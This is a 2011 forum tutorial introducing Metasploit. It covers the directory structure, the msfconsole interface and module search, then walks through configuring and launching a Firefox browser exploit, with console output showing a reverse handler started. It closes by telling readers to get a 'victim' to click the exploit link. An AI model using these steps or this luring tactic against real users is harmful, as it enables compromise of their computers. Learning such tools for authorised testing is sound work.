How to get started with Metasploit

lionaneesh's Avatar author of How to get started with Metasploit
Contributed by ()
This is an article on How to get started with Metasploit in Ethical hacking Tips.
Metasploit is a Hacking Framework consisting of tools , exploits , Knowledge etc etc...Its a Boon to pen-testers , exploit developers and Hackers ...

This Project was started by H.D Moore and is now open source project managed by Rapid7

For Downloading and installing instructions Click here

I will use my Ubuntu 10.10 OS for code samples. So , some commands maybe different on other OS versions and if you have queries and questions please don't hesitate to post in comments below.

The directory structure



Metasplot have a very self-explanatory and a user-friendly directory structure..

The metasploit directory is located at /opt/metasploit3 in Linux

Code:
aneesh@aneesh-laptop:~$ cd /opt/metasploit3/
aneesh@aneesh-laptop:/opt/metasploit3$
Lets see the different directories :-

Code:
aneesh@aneesh-laptop:/opt/metasploit3$ ls

app  bin  env.sh  lib  msf3  run.sh

aneesh@aneesh-laptop:/opt/metasploit3$ cd msf3/

aneesh@aneesh-laptop:/opt/metasploit3/msf3$ ls

armitage       HACKING  msfconsole  msfgui       msfpescan  plugins  tools

data           lib      msfd        msfmachscan  msfrpc     README

documentation  modules  msfelfscan  msfopcode    msfrpcd    scripts

external       msfcli   msfencode   msfpayload   msfupdate  test

aneesh@aneesh-laptop:/opt/metasploit3/msf3$
The Data directory : contains the basic data for exploits like php sources , wordlists etc etc...

Code:
aneesh@aneesh-laptop:/opt/metasploit3/msf3$ cd data/

aneesh@aneesh-laptop:/opt/metasploit3/msf3/data$ ls

armitage             isight.bundle            passivex   vncdll.dll

eicar.com            java                     php        vncdll.x64.dll

eicar.txt            lab                      post       wmap

emailer_config.yaml  meterpreter              snmp       wordlists

exploits             msfcrawler               sounds

gui                  msflinker_linux_x86.bin  sql

ipwn                 msfpescan                templates
The lib directory : The name is pretty self-explanatory , its the file that contains all the libraries necessary to work metasploit

The main directory that is of great use to us is the modules directory

Code:
aneesh@aneesh-laptop:/opt/metasploit3/msf3$ cd modules

aneesh@aneesh-laptop:/opt/metasploit3/msf3/modules$ ls

auxiliary  encoders  exploits  modules.rb.ts.rb  nops  payloads  post

aneesh@aneesh-laptop:/opt/metasploit3/msf3/modules$
  • The exploit dir : contains the exploits for various architectures
  • The encoders dir : Contains varoius encoders for encoding pages , programs etc etc...
  • The auxiliary dir : Contains a list of tools used for pen-testing like DOS , sniffers , etc etc..
  • The payloads, nops dir : Provides the shellcodes used for exploitations...(Code execution)

Getting to know Metasploit



The main part of metasploit is its interface types. The four main types of interfaces are :-
  1. msfweb (The Web Interface)
  2. msfgui (The graphical user interface)
  3. msfconsole (The console interface)
  4. msfcli (The command line interface)
The most powerful and the most used interface is the Console interface so , We'll be looking at that throughout this tutorial...

To open metasploit just type 'msfconsole' in your shell and you should get an output similar to this :-
Code:
aneesh@aneesh-laptop:~$ msfconsole
                                  _

                                 | |      o

 _  _  _    _ _|_  __,   ,    _  | |  __    _|_

/ |/ |/ |  |/  |  /  |  / \_|/ \_|/  /  \_|  |

  |  |  |_/|__/|_/\_/|_/ \/ |__/ |__/\__/ |_/|_/

                           /|

                           \|

       =[ metasploit v3.6.0-dev [core:3.6 api:1.0]

+ -- --=[ 643 exploits - 328 auxiliary

+ -- --=[ 216 payloads - 27 encoders - 8 nops

       =[ svn r11647 updated today (2011.01.26)

msf >
Now that we know how to open metasploit lets see some of its modules...

We use several commands for it :-

The show all command syntax - show all
The search command syntax - search (pattern)

For eg :-

Lets search for firefox exploits and see whats there in stores for us

Code:
msf > search firefox
[*] Searching loaded modules for pattern 'firefox'...

Exploits

========

   Name                                              Disclosure Date  Rank       Description

   ----                                              ---------------  ----       -----------

   multi/browser/firefox_escape_retval               2006-07-14       normal     Firefox 3.5 escape() Return Value Memory Corruption

   multi/browser/firefox_queryinterface              2006-02-02       normal     Firefox location.QueryInterface() Code Execution

   multi/browser/mozilla_compareto                   2005-07-13       normal     Mozilla Suite/Firefox InstallVersion->compareTo() Code Execution

   multi/browser/mozilla_navigatorjava               2006-07-25       normal     Mozilla Suite/Firefox Navigator Object Code Execution

   windows/browser/apple_quicktime_rtsp              2007-01-01       normal     Apple QuickTime 7.1.3 RTSP URI Buffer Overflow

   windows/browser/awingsoft_winds3d_sceneurl        2009-11-14       excellent  AwingSoft Winds3D Player 3.5 SceneURL Download and Execute

   windows/browser/dxstudio_player_exec              2009-06-09       excellent  Worldweaver DX Studio Player <= 3.0.29 shell.execute() Command Execution

   windows/browser/ms07_017_ani_loadimage_chunksize  2007-03-28       great      Windows ANI LoadAniIcon() Chunk Size Stack Buffer Overflow (HTTP)

msf >
You will notice that there are many of exploits on browser vulnerabilities..and maybe some are useful for us...

This is the power of metasploit!!

lets use the 'use' command to select a exploit

Syntax :-
Code:
use (path)
Output :-
Code:
msf > use exploit/multi/browser/firefox_escape_retval 

msf exploit(firefox_escape_retval) >
Now lets see the options.
Code:
show options
Output :-
Code:
msf exploit(firefox_escape_retval) > show options

Module options (exploit/multi/browser/firefox_escape_retval):

   Name        Current Setting  Required  Description

   ----        ---------------  --------  -----------

   SRVHOST     0.0.0.0          yes       The local host to listen on.

   SRVPORT     8080             yes       The local port to listen on.

   SSL         false            no        Negotiate SSL for incoming connections

   SSLVersion  SSL3             no        Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)

   URIPATH                      no        The URI to use for this exploit (default is random)

Exploit target:

   Id  Name

   --  ----

   0   Firefox 3.5.0 on Windows XP SP0-SP3
Let us now set the options

This can be done by using :-

Code:
set (option name) (value)
Now lets set some options according to our needs
Code:
msf exploit(firefox_escape_retval) > set SRVHOST localhost

SRVHOST => localhost

msf exploit(firefox_escape_retval) > set SRVPORT 80

SRVPORT => 80

msf exploit(firefox_escape_retval) > set URIPATH /exploit

URIPATH => /exploit
Explanations :-
  1. The 'set SRVHOST localhost' means set the host to localhost this is the server on which our exploit is hosted..
  2. The 'set SRVPORT 80' means this is the Post no on which the server will be hosted …
  3. As we know Post 80 is default for web-servers we use this The 'set URIPATH /exploit' means the URLPATH of the exploit...

This means that we have to bring the victim to click on the page of url http://localhost/exploit
So as to make the exploit work!!

Now as the options are set lets run the exploit...

This can be done by :-

Code:
exploit
Output :-
Code:
msf exploit(firefox_escape_retval) > exploit
[*] Exploit running as background job.
[*] Started reverse handler on 10.10.2.35:4444 
[*] Using URL: http://localhost:80/exploit
[*] Server started.
So the output states that we have successfully started the exploit!!

Now the work gets a lot more easier...

We just have to make a user with this Browser vulnerability click this link..

I hope it is enough to get you started working with metasploit...
Invasive contributor
27Jan2011,16:46   #2
lionaneesh's Avatar
Thanks Shabbir...
For accepting my articles and making it much better with the edits...

Thanks a ton!!!